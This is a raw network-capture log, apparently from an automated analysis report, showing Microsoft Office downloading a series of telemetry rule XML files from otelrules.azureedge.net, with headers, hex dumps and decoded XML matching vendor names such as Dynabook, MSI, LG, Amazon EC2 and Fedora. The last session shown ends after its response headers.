            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


            Session IDSource IPSource PortDestination IPDestination Port
            43192.168.2.44979713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:32 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:32 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:32 GMT
            Content-Type: text/xml
            Content-Length: 478
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
            ETag: "0x8DC582B9B233827"
            x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085032Z-1777c6cb754n67brhC1TEBcp9c0000000az0000000005568
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:32 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            44192.168.2.44979913.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:32 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:32 UTC491INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:32 GMT
            Content-Type: text/xml
            Content-Length: 468
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
            ETag: "0x8DC582BB046B576"
            x-ms-request-id: 56368140-d01e-0082-2bc3-3be489000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085032Z-r1d97b99577n5jhbhC1TEB74vn0000000a2g0000000088fg
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            X-Cache-Info: L1_T2
            Accept-Ranges: bytes
            2024-11-21 08:50:32 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            45192.168.2.44979813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:32 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:32 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:32 GMT
            Content-Type: text/xml
            Content-Length: 404
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
            ETag: "0x8DC582B95C61A3C"
            x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085032Z-178bfbc474bwlrhlhC1NYCy3kg0000000180000000006n3h
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:32 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


            Session IDSource IPSource PortDestination IPDestination Port
            46192.168.2.44980013.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:32 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:33 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:32 GMT
            Content-Type: text/xml
            Content-Length: 400
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
            ETag: "0x8DC582BB2D62837"
            x-ms-request-id: 792329fd-401e-0035-1f6c-3b82d8000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085032Z-178bfbc474b9xljthC1NYCtw94000000016g00000000363q
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:33 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


            Session IDSource IPSource PortDestination IPDestination Port
            47192.168.2.44980113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:34 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:34 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:34 GMT
            Content-Type: text/xml
            Content-Length: 479
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
            ETag: "0x8DC582BB7D702D0"
            x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085034Z-1777c6cb754xrr98hC1TEB3kag0000000at0000000002nvg
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:34 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            48192.168.2.44980213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:34 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:34 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:34 GMT
            Content-Type: text/xml
            Content-Length: 425
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
            ETag: "0x8DC582BBA25094F"
            x-ms-request-id: c2180679-501e-008f-16bc-3b9054000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085034Z-178bfbc474bvjk8shC1NYC83ns0000000120000000008nnd
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:34 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


            Session IDSource IPSource PortDestination IPDestination Port
            49192.168.2.44980413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:34 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:34 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:34 GMT
            Content-Type: text/xml
            Content-Length: 448
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
            ETag: "0x8DC582BB389F49B"
            x-ms-request-id: c1a1e3cb-901e-005b-1f8c-3a2005000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085034Z-1777c6cb7544nvmshC1TEBf7qc0000000ak000000000hxv3
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:34 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


            Session IDSource IPSource PortDestination IPDestination Port
            50192.168.2.44980313.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:34 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:34 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:34 GMT
            Content-Type: text/xml
            Content-Length: 475
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
            ETag: "0x8DC582BB2BE84FD"
            x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085034Z-178bfbc474b9fdhphC1NYCac0n000000018g000000000vq3
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:34 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            51192.168.2.44980513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:34 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:35 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:35 GMT
            Content-Type: text/xml
            Content-Length: 491
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
            ETag: "0x8DC582B98B88612"
            x-ms-request-id: 5b8d3f05-a01e-006f-2465-3b13cd000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085035Z-178bfbc474bgvl54hC1NYCsfuw000000014000000000dpgz
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:35 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            52192.168.2.44980713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:36 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:36 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:36 GMT
            Content-Type: text/xml
            Content-Length: 479
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
            ETag: "0x8DC582B989EE75B"
            x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085036Z-178bfbc474bvjk8shC1NYC83ns000000010g00000000d1hs
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:36 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            53192.168.2.44980613.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:36 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:37 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:36 GMT
            Content-Type: text/xml
            Content-Length: 416
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
            ETag: "0x8DC582BAEA4B445"
            x-ms-request-id: c4abe473-d01e-008e-4d67-3b387a000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085036Z-178bfbc474b9xljthC1NYCtw94000000011g00000000eq94
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:37 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


            Session IDSource IPSource PortDestination IPDestination Port
            54192.168.2.44980813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:36 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:37 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:37 GMT
            Content-Type: text/xml
            Content-Length: 415
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
            ETag: "0x8DC582BA80D96A1"
            x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085037Z-178bfbc474bnwsh4hC1NYC2ubs000000017g00000000brg3
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
